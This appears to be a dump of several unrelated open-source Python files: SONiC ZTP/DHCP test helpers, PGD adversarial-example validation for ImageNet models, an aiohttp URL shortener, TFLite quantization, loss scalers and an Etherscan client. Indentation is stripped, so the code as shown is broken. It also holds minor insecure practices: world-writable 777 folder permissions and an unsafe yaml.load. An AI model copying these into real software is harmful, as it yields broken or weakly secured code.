basic_obj.remove_file(dut, data.config_db_path)
st.reboot(dut, reboot_type, skip_port_wait=True)
st.wait_system_status(dut, 500)
elif data.device_action == "run":
ztp_operations(dut, data.device_action)
if "band_type" in data and data.band_type=="inband":
if not basic_obj.poll_for_system_status(dut):
st.log("Sytem is not ready ..")
st.report_env_fail("system_not_ready")
if not basic_obj.check_interface_status(dut, ztp_params.oob_port,"up"):
basic_obj.ifconfig_operation(dut, ztp_params.oob_port, "down")
interface_status = basic_obj.check_interface_status(dut, ztp_params.inband_port, "up")
if interface_status is not None:
if not interface_status:
intf_obj.interface_noshutdown(dut, ztp_params.inband_port, cli_type=cli_type)
if "service" in data and data.service == "disable":
basic_obj.service_operations_by_systemctl(dut, "ztp", "stop")
if basic_obj.verify_service_status(dut, "ztp"):
st.log("ZTP status is not stopped")
st.report_fail("service_not_stopped", "ztp")
basic_obj.service_operations_by_systemctl(dut, "ztp", "start")
if not poll_ztp_status(dut, ["IN-PROGRESS", "Not Started", "SUCCESS"], cli_type=cli_type):
st.report_fail("ztp_max_polling_interval")
if "check" in data and data.check == "not":
if verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
else:
st.log("Iteration count {}".format(iteration))
st.log("REBOOT ON SUCCESS - {}".format(reboot_on_success))
if reboot_on_success:
if "configdb-json" in reboot_on_success:
st.wait_system_reboot(dut)
st.wait_system_status(dut, 300)
result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=reboot_on_success, cli_type=cli_type)
else:
result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
if not result:
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
if reboot_on_success:
output = show_ztp_status(dut, cli_type=cli_type)
if output["status"] != "SUCCESS":
st.wait(300, "Waiting for device to reboot after success...")
st.wait_system_status(dut, 300)
# st.wait_system_reboot(dut)
if not verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
st.banner(boot_up_obj.sonic_installer_list(dut))
verify_ztp_filename_logs(dut, data)
if "ztp_log_string" in data and data.ztp_log_string:
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1, data.ztp_log_string))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
if "result" in data and data.result == "pass":
st.report_pass("test_case_passed")
def write_option_239_to_dhcp_server(ssh_conn_obj, data):
st.log("##################### Writing option 239 to dhcp config file ... ##################")
option_239 = 'option provision-url ='
provisioning_script_path = "http://{}{}/{}".format(data["server_ip"], data["config_path"], data["provision_script"])
option_239_config = '{} "{}";'.format(option_239, provisioning_script_path)
option_67_config = "option bootfile-name"
basic_obj.write_update_file(ssh_conn_obj, option_67_config,
"##", data["dhcp_config_file"])
if not basic_obj.write_update_file(ssh_conn_obj, option_239,
option_239_config, data["dhcp_config_file"]):
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def write_option_225_to_dhcp_server(ssh_conn_obj, data):
option_225 = "option option-225 ="
option_225_path = data["minigraph_path"]
option_225_config = '{} "{}";'.format(option_225, option_225_path)
option_67_config = "option bootfile-name"
option_239 = 'option provision-url ='
basic_obj.write_update_file(ssh_conn_obj, option_67_config,
"##", data["dhcp_config_file"])
basic_obj.write_update_file(ssh_conn_obj, option_239,
"##", data["dhcp_config_file"])
if not basic_obj.write_update_file(ssh_conn_obj, option_225,
option_225_config, data["dhcp_config_file"]):
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def config_and_verify_option_225(ssh_conn_obj, dut, ztp_params, data, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
if data.option_type == "225":
if "func_name" in data:
syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
data.search_pattern = r'\s*option option-225\s*\S*\s*"\S+";'
data.option_string = "option option-225 " # "option dhcp6.boot-file-url "
data.option_url = data.minigraph_path
data.option_type = "option_67"
clear_options_from_dhcp_server(ssh_conn_obj, data)
data.option_type = "option_239"
clear_options_from_dhcp_server(ssh_conn_obj, data)
write_option_to_dhcp_server(ssh_conn_obj, data)
# write_option_225_to_dhcp_server(ssh_conn_obj, data)
basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
st.log("{} service not running".format(data.dhcp_service_name))
st.report_fail("service_not_running", data.dhcp_service_name)
data.device_action = "reboot" if cli_type == "klish" else data.device_action
if data.device_action == "reboot":
reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
basic_obj.remove_file(dut, data.config_db_path)
st.reboot(dut, reboot_type, skip_port_wait=True)
st.wait_system_status(dut, 400)
elif data.device_action == "run":
ztp_operations(dut, data.device_action)
if not verify_ztp_status(dut, cli_type=cli_type):
if "logs_path" in data and "func_name" in data:
capture_syslogs(dut, data.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
verify_ztp_filename_logs(dut, data)
if "ztp_log_string" in data and data.ztp_log_string:
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
data.ztp_log_string))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
def verify_ztp_attributes(dut, property, value, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
This is to verify the ztp attributes with the provided value
Author: <NAME> (<EMAIL>)
:param dut: dut object
:param property: status, service, adminmode, filenames, timestamp, source
:param value: This is string except filenames, for file names {'03-test-plugin': 'Not Started', '02-test-plugin':
'Not Started', 'configdb-json': 'Not Started'}
:return: boolean
"""
response = show_ztp_status(dut, cli_type=cli_type)
if not response:
return False
if property in response:
if property == "filenames":
filenames = response["filenames"][0]
for filename, status in filenames:
if value[filename] != status:
return False
else:
if response[property] != value:
return False
else:
return False
return True
def verify_ztp_filename_logs(dut, data, status="SUCCESS", condition="positive"):
"""
Author: <NAME> (<EMAIL>)
API to verify logs
:param dut:
:param data:
:param status:
:return:
"""
filenames = list([str(e) for e in data.file_names]) if isinstance(data.file_names, list) else [data.file_names]
log_msg = data.log_msg if "log_msg" in data and data.log_msg else "Checking configuration section {} result: {}"
match = data.match if "match" in data else ""
for file_name in filenames:
log_string_1 = log_msg.format(file_name, status)
st.log(log_string_1)
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, log_string_1, match=match):
if condition == "positive":
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, log_string_1))
if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, log_string_1, match=match):
st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
log_string_1))
st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, log_string_1)
else:
return True
else:
return True
def config_ztp_backdoor_options(dut, ztp_cfg={"admin-mode": True, "restart-ztp-interval": 30}, dut_ztp_cfg_file="/host/ztp/ztp_cfg.json"):
"""
Author: <NAME> (<EMAIL>)
Function to enable backward options for ZTP
:param dut:
:param ztp_cfg:
:param dut_ztp_cfg_file:
:return:
"""
ztp_cfg_file = basic_obj.write_to_json_file(ztp_cfg)
st.upload_file_to_dut(dut, ztp_cfg_file, dut_ztp_cfg_file)
def ztp_status_verbose(dut, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to get the ztp status verbose output with filename and its details as we are getting the status in ztp status API
Author: <NAME> (<EMAIL>)
:param dut:
:return:
"""
command = "sudo ztp status -v" if cli_type == "click" else "show ztp-status"
if cli_type == "click":
return st.show(dut, command, type=cli_type)
else:
return show_ztp_status(dut, cli_type=cli_type)
def verify_plugin_chronological_order(dut, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to verify the plugin chronological order of ztp status
Author: <NAME> (<EMAIL>)
:param dut:
:return:
"""
st.log("Verifying timestamp for chronological order ... ")
output = ztp_status_verbose(dut, cli_type=cli_type)
data = list()
if cli_type == "click":
for val in output:
data.append(val["filetimestamp"])
else:
for val in output["timestamps"]:
for _, timestamp in val.items():
data.append(timestamp)
data.sort()
for i, _ in enumerate(data):
if i + 1 < len(data):
result = utils_obj.date_time_delta(data[i], data[i + 1], True)
st.log(result)
if result[0] < 0 or result[1] < 0:
st.log("Observed timestamp difference is not as expected ...")
return False
return True
def verify_dhclient_on_interface(dut, search_string, interface, expected_count=2):
"""
API to verify DHCLIENT on provided interface using ps aux command
Author: <NAME> (<EMAIL>)
:param dut:
:param search_string:
:param interface:
:param expected_count:
:return:
"""
st.log("Verifying dhclient for {} interface".format(interface))
ps_aux = basic_obj.get_ps_aux(dut, search_string)
# if len(ps_aux) != expected_count:
st.log("Observed {} DHCLIENT entries on {} interface".format(len(ps_aux), interface))
# return False
dhclient_str = "/run/dhclient.{}.pid".format(interface)
if not ps_aux:
st.error("DHCLIENT process not found on DUT ...")
return False
for entry in ps_aux:
if dhclient_str in entry["command"]:
st.log("Required dhclient is found ...")
return True
return False
def create_required_folders(conn_obj, path_list):
"""
API to create folders as per the provided path in bulk
:param dut:
:param path:
:return:
"""
path_list = [path_list] if type(path_list) is str else list([str(e) for e in path_list])
for path in path_list:
basic_obj.make_dir(conn_obj, path, "server")
basic_obj.change_permissions(conn_obj, path, 777, "server")
def config_dhcpv6_options(ssh_conn_obj, ztp_params, config_params, options=dict(), cli_type=""):
"""
Common function to configure dhcpv6 options and verify the result on both inband and out of band interfaces
:param ssh_conn_obj:
:param ztp_params:
:param config_params:
:param options:
:return:
"""
cli_type = st.get_ui_type(config_params.dut, cli_type=cli_type)
retry_count = config_params.retry_count if "retry_count" in config_params and config_params.retry_count else 0
iteration = config_params.iteration if "iteration" in config_params and config_params.iteration else 300
delay = config_params.delay if "delay" in config_params and config_params.delay else 3
expect_reboot = True if "expect_reboot" in options and options ["expect_reboot"] else False
st.log(config_params)
if "func_name" in config_params:
syslog_file_names = ["syslog_1_{}".format(config_params.func_name), "syslog_{}".format(config_params.func_name)]
if "json_content" in config_params:
file_path = basic_obj.write_to_json_file(config_params.json_content)
st.log(file_path)
if file_path:
destination_path = "{}{}/{}".format(config_params.home_path, ztp_params.config_path, config_params.ztp_file)
st.log(destination_path)
basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
config_params.option_59_url = "http://[{}]{}/{}".format(config_params.static_ip, ztp_params.config_path, config_params.ztp_file)
config_params.search_pattern = r'\s*option\s+dhcp6.boot-file-url\s+"\S+";'
write_option_59_to_dhcp_server(ssh_conn_obj, config_params)
basic_obj.service_operations(ssh_conn_obj, config_params.dhcp6_service_name, "restart", "server")
if not verify_dhcpd_service_status(ssh_conn_obj, config_params.dhcpd6_pid):
st.log("{} service is running which is not expected".format(config_params.dhcp6_service_name))
st.report_fail("service_running_not_expected", config_params.dhcp6_service_name)
reboot_type = config_params.reboot_type if "reboot_type" in config_params and config_params.reboot_type else "normal"
if "ztp_operation" in config_params:
config_params.ztp_operation = "reboot" if cli_type == "klish" else config_params.ztp_operation
if config_params.ztp_operation == "reboot":
basic_obj.remove_file(config_params.dut, config_params.config_db_path)
st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
elif config_params.ztp_operation == "run":
ztp_operations(config_params.dut, config_params.ztp_operation)
else:
st.log("ZTP operation is not mentioned hence rebooting the device ...")
basic_obj.remove_file(config_params.dut, config_params.config_db_path)
st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
if "reboot_on_success" in options and options["reboot_on_success"]:
result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=options["reboot_on_success"], cli_type=cli_type)
else:
result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
if not result:
if "logs_path" in config_params and "func_name" in config_params:
capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
if "reboot_on_success" in options and options["reboot_on_success"]:
reboot_obj.config_reload(config_params.dut)
st.wait(5)
if not ip_obj.ping(config_params.dut, config_params.static_ip, family="ipv6"):
st.log("Pinging to DHCP server failed from DUT, issue either with DUT or server")
# intf_obj.enable_dhcp_on_interface(config_params.dut, config_params.network_port, "v6")
if not verify_ztp_status(config_params.dut, retry_count, iteration, delay, cli_type=cli_type):
if "logs_path" in config_params and "func_name" in config_params:
capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
st.log("ZTP status verification failed")
st.report_fail("ztp_status_verification_failed")
verify_ztp_filename_logs(config_params.dut, config_params)
if "ztp_log_string" in config_params and config_params.ztp_log_string:
if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path, config_params.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path, config_params.ztp_log_string))
if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path_1, config_params.ztp_log_string):
st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path_1, config_params.ztp_log_string))
st.report_fail("ztp_log_verification_failed", config_params.ztp_log_path_1, config_params.ztp_log_string)
if "result" in config_params and config_params.result == "pass":
st.report_pass("test_case_passed")
def write_option_59_to_dhcp_server(connection_obj, data):
"""
API to add option 59 in DHCP config file.
:param connection_obj:
:param data:
:return:
"""
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
option_59 = "option dhcp6.boot-file-url "
option_59_path = data["option_59_url"]
option_59_config = "'{} \"{}\";'".format(option_59, option_59_path)
if line_number >= 0:
basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
basic_obj.write_to_file(connection_obj, option_59_config, data.dhcp_config_file, device="server")
# else:
# basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
# basic_obj.write_to_file_to_line(connection_obj, option_59_config, line_number, data.dhcp_config_file, device="server")
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
if line_number <=0:
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def write_option_to_dhcp_server(connection_obj, data):
"""
Common API to write matched line with new one
:param connection_obj:
:param data:
:return:
"""
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
option = data.option_string # "option dhcp6.boot-file-url "
option_path = data.option_url
st.log("#####LINE NUMBER{}".format(line_number))
option_config = "'{} \"{}\";'".format(option, option_path)
if int(line_number) > 0:
# line_number = data.line_number if line_number in data else 60
basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
basic_obj.write_to_file(connection_obj, option_config, data.dhcp_config_file, device="server")
# basic_obj.write_to_file_to_line(connection_obj, option_config, line_number, data.dhcp_config_file, device="server")
line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
st.log("#####LINE NUMBER{}".format(line_number))
if line_number <= 0:
st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
st.report_fail("content_not_found")
def clear_options_from_dhcp_server(connection_obj, data):
st.log("Clearing OPTIONS from DHCP server")
option = ""
if "option_type" in data and data.option_type == "option_67":
option = r'\s*option\s+bootfile-name\s*\S*\s*"\S+";'
elif "option_type" in data and data.option_type == "option_239":
option = r'\s*option\s+provision-url\s*\S*\s*"\S+";'
elif "option_type" in data and data.option_type == "option_59":
option = r'\s*option\s+dhcp6.boot-file-url\s+"\S+";'
elif "option_type" in data and data.option_type == "option_225":
option = r'\s*option option-225\s*\S*\s*"\S+";'
st.log("OPTION is {}".format(option))
st.log("CONFIG FILE is {}".format(data.dhcp_config_file))
if option:
line_number = basic_obj.get_file_number_with_regex(connection_obj,
option, data.dhcp_config_file)
if line_number > 0:
basic_obj.delete_line_using_line_number(connection_obj, line_number,
data.dhcp_config_file)
def verify_dhcpd_service_status(dut, process_id):
"""
API to verify DHCLIENT on provided interface using ps aux command
Author: <NAME> (<EMAIL>)
:param dut:
:param search_string:
:param interface:
:param expected_count:
:return:
"""
st.log("Verifying DHCPD for {} ".format(process_id))
dhcpd_pid = "/run/dhcp-server/{}".format(process_id)
ps_aux = basic_obj.get_ps_aux(dut, dhcpd_pid, device="server")
st.log(ps_aux)
config_string = ""
if process_id == "dhcpd6.pid":
config_string = "-cf /etc/dhcp/dhcpd6.conf"
if process_id == "dhcpd.pid":
config_string = "-cf /etc/dhcp/dhcpd.conf"
st.log("Verifying the output with {}".format(config_string))
if config_string not in ps_aux:
st.log("Required DHCPD service not found ...")
return False
return True
def capture_syslogs(dut, destination_path, file_name):
file_names = list(file_name) if isinstance(file_name, list) else [file_name]
syslog_paths = ["/var/log/syslog.1", "/var/log/syslog"]
for i, syslog_path in enumerate(syslog_paths):
dst_file = "{}/{}".format(destination_path, file_names[i])
st.download_file_from_dut(dut, syslog_path, dst_file)
return True
|
hwtypes/compatibility.py | splhack/hwtypes | 167 | 32604 | import sys
__all__ = ['IntegerTypes', 'StringTypes']
if sys.version_info < (3,):
IntegerTypes = (int, long)
StringTypes = (str, unicode)
long = long
import __builtin__ as builtins
else:
IntegerTypes = (int,)
StringTypes = (str,)
long = int
import builtins
|
demos/shortify/shortify/utils.py | Ixyk-Wolf/aiohttp-demos | 649 | 32616 | import aioredis
import trafaret as t
import yaml
from aiohttp import web
CONFIG_TRAFARET = t.Dict(
{
t.Key('redis'): t.Dict(
{
'port': t.Int(),
'host': t.String(),
'db': t.Int(),
'minsize': t.Int(),
'maxsize': t.Int(),
}
),
'host': t.IP,
'port': t.Int(),
}
)
def load_config(fname):
with open(fname, 'rt') as f:
data = yaml.load(f)
return CONFIG_TRAFARET.check(data)
async def init_redis(conf, loop):
pool = await aioredis.create_redis_pool(
(conf['host'], conf['port']),
minsize=conf['minsize'],
maxsize=conf['maxsize'],
loop=loop,
)
return pool
CHARS = "abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789"
def encode(num, alphabet=CHARS):
if num == 0:
return alphabet[0]
arr = []
base = len(alphabet)
while num:
num, rem = divmod(num, base)
arr.append(alphabet[rem])
arr.reverse()
return ''.join(arr)
ShortifyRequest = t.Dict({t.Key('url'): t.URL})
def fetch_url(data):
try:
data = ShortifyRequest(data)
except t.DataError:
raise web.HTTPBadRequest('URL is not valid')
return data['url']
|
067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 1,529 | 32619 | ### tensorflow==2.3.1
import tensorflow as tf
# Float16 Quantization - Input/Output=float32
height = 384
width = 384
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model')
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_model = converter.convert()
with open('midas_{}x{}_float16_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Float16 Quantization complete! - midas_{}x{}_float16_quant.tflite'.format(height, width))
|
antlr-python/ChatErrorListener.py | evilkirin/antlr-mega-tutorial | 138 | 32633 | import sys
from antlr4 import *
from ChatParser import ChatParser
from ChatListener import ChatListener
from antlr4.error.ErrorListener import *
import io
class ChatErrorListener(ErrorListener):
def __init__(self, output):
self.output = output
self._symbol = ''
def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):
self.output.write(msg)
if offendingSymbol is not None:
self._symbol = offendingSymbol.text
else:
self._symbol = recognizer.getTokenErrorDisplay(offendingSymbol);
@property
def symbol(self):
return self._symbol |
ImageNet/lib/validation.py | mhilmiasyrofi/AT_HE | 107 | 32648 | from utils import *
import torch
import sys
import numpy as np
import time
import torchvision
from torch.autograd import Variable
import torchvision.transforms as transforms
import torchvision.datasets as datasets
def validate_pgd(val_loader, model, criterion, K, step, configs, logger, save_image=False, HE=False):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# Initiate the meters
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
eps = configs.ADV.clip_eps
model.eval()
end = time.time()
logger.info(pad_str(' PGD eps: {}, K: {}, step: {} '.format(eps, K, step)))
if HE == True:
is_HE = '_HE'
else:
is_HE = ''
if configs.pretrained:
is_HE = '_pretrained'
for i, (input, target) in enumerate(val_loader):
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
#save original images
if save_image == True and i < 2:
original_images_save = input.clone()
for o in range(input.size(0)):
torchvision.utils.save_image(original_images_save[o, :, :, :], 'saved_images/original_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
randn = torch.FloatTensor(input.size()).uniform_(-eps, eps).cuda()
input += randn
input.clamp_(0, 1.0)
orig_input = input.clone()
for _ in range(K):
invar = Variable(input, requires_grad=True)
in1 = invar - mean
in1.div_(std)
output = model(in1)
ascend_loss = criterion(output, target)
ascend_grad = torch.autograd.grad(ascend_loss, invar)[0]
pert = fgsm(ascend_grad, step)
# Apply purturbation
input += pert.data
input = torch.max(orig_input-eps, input)
input = torch.min(orig_input+eps, input)
input.clamp_(0, 1.0)
#save adv images
if save_image == True and i < 2:
adv_images_save = input.clone()
for o in range(input.size(0)):
torchvision.utils.save_image(adv_images_save[o, :, :, :], 'saved_images/adv_images'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
#save scaled perturbation
perturbation = input - orig_input
perturbation.clamp_(-eps,eps)
scaled_perturbation = (perturbation.clone() + eps) / (2 * eps)
scaled_perturbation.clamp_(0, 1.0)
if save_image == True and i < 2:
for o in range(input.size(0)):
torchvision.utils.save_image(scaled_perturbation[o, :, :, :], 'saved_images/scaled_perturbation'+is_HE+'/{}.png'.format(o + configs.DATA.batch_size*i))
input.sub_(mean).div_(std)
with torch.no_grad():
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % configs.TRAIN.print_freq == 0:
print('PGD Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
sys.stdout.flush()
print(' PGD Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def validate(val_loader, model, criterion, configs, logger):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# Initiate the meters
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
with torch.no_grad():
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# compute output
input = input - mean
input.div_(std)
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
prec1, prec5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(prec1[0], input.size(0))
top5.update(prec5[0], input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % configs.TRAIN.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1, top5=top5))
sys.stdout.flush()
print(' Final Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def validate_ImagetNet_C(val_loader_name, model, criterion, configs, logger):
# Mean/Std for normalization
mean = torch.Tensor(np.array(configs.TRAIN.mean)[:, np.newaxis, np.newaxis])
mean = mean.expand(3,configs.DATA.crop_size, configs.DATA.crop_size).cuda()
std = torch.Tensor(np.array(configs.TRAIN.std)[:, np.newaxis, np.newaxis])
std = std.expand(3, configs.DATA.crop_size, configs.DATA.crop_size).cuda()
# switch to evaluate mode
model.eval()
fil_index = ['/1','/2','/3','/4','/5']
avg_return = 0
for f in fil_index:
valdir = os.path.join(configs.data, val_loader_name+f)
print(' File: ', valdir)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, transforms.Compose([
transforms.Resize(configs.DATA.img_size),
transforms.CenterCrop(configs.DATA.crop_size),
transforms.ToTensor(),
])),
batch_size=configs.DATA.batch_size, shuffle=False,
num_workers=configs.DATA.workers, pin_memory=True)
# Initiate the meters
top1 = AverageMeter()
end = time.time()
for i, (input, target) in enumerate(val_loader):
with torch.no_grad():
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
# compute output
input = input - mean
input.div_(std)
output = model(input)
# measure accuracy and record loss
prec1,_ = accuracy(output, target, topk=(1,2))
top1.update(prec1[0], input.size(0))
# if i % configs.TRAIN.print_freq == 0:
# print('PGD Test: [{0}/{1}]\t'
# 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
# i, len(val_loader),top1=top1))
# print('Time: ', time.time() - end)
# sys.stdout.flush()
print('Prec: ',top1.avg.cpu().item())
avg_return += top1.avg.cpu().item()
print('Avergae Classification Accuracy is: ', avg_return / 5.)
return
|
docs/examples/use_cases/video_superres/common/loss_scaler.py | cyyever/DALI | 3,967 | 32685 | <gh_stars>1000+
import torch
class LossScaler:
def __init__(self, scale=1):
self.cur_scale = scale
# `params` is a list / generator of torch.Variable
def has_overflow(self, params):
return False
# `x` is a torch.Tensor
def _has_inf_or_nan(x):
return False
# `overflow` is boolean indicating whether we overflowed in gradient
def update_scale(self, overflow):
pass
@property
def loss_scale(self):
return self.cur_scale
def scale_gradient(self, module, grad_in, grad_out):
return tuple(self.loss_scale * g for g in grad_in)
def backward(self, loss):
scaled_loss = loss*self.loss_scale
scaled_loss.backward()
class DynamicLossScaler:
def __init__(self,
init_scale=2**32,
scale_factor=2.,
scale_window=1000):
self.cur_scale = init_scale
self.cur_iter = 0
self.last_overflow_iter = -1
self.scale_factor = scale_factor
self.scale_window = scale_window
# `params` is a list / generator of torch.Variable
def has_overflow(self, params):
# return False
for p in params:
if p.grad is not None and DynamicLossScaler._has_inf_or_nan(p.grad.data):
return True
return False
# `x` is a torch.Tensor
def _has_inf_or_nan(x):
inf_count = torch.sum(x.abs() == float('inf'))
if inf_count > 0:
return True
nan_count = torch.sum(x != x)
return nan_count > 0
# `overflow` is boolean indicating whether we overflowed in gradient
def update_scale(self, overflow):
if overflow:
#self.cur_scale /= self.scale_factor
self.cur_scale = max(self.cur_scale/self.scale_factor, 1)
self.last_overflow_iter = self.cur_iter
else:
if (self.cur_iter - self.last_overflow_iter) % self.scale_window == 0:
self.cur_scale *= self.scale_factor
# self.cur_scale = 1
self.cur_iter += 1
@property
def loss_scale(self):
return self.cur_scale
def scale_gradient(self, module, grad_in, grad_out):
return tuple(self.loss_scale * g for g in grad_in)
def backward(self, loss):
scaled_loss = loss*self.loss_scale
scaled_loss.backward()
|
cog/__init__.py | uniphil/cog | 158 | 32703 | <filename>cog/__init__.py
def cog():
return "Cog is alive."
|
etherscan/stats.py | adamzhang1987/py-etherscan-api | 458 | 32711 | from .client import Client
class Stats(Client):
def __init__(self, api_key='YourApiKeyToken'):
Client.__init__(self, address='', api_key=api_key)
self.url_dict[self.MODULE] = 'stats'
def get_total_ether_supply(self):
self.url_dict[self.ACTION] = 'ethsupply'
self.build_url()
req = self.connect()
return req['result']
def get_ether_last_price(self):
self.url_dict[self.ACTION] = 'ethprice'
self.build_url()
req = self.connect()
return req['result']
|
SimpleSign.py | wanzhiguo/mininero | 182 | 32719 | import MiniNero
import ed25519
import binascii
import PaperWallet
import cherrypy
import os
import time
import bitmonerod
import SimpleXMR2
import SimpleServer
message = "send0d000114545737471em2WCg9QKxRxbo6S3xKF2K4UDvdu6hMc"
message = "send0d0114545747771em2WCg9QKxRxbo6S3xKF2K4UDvdu6hMc"
sec = raw_input("sec?")
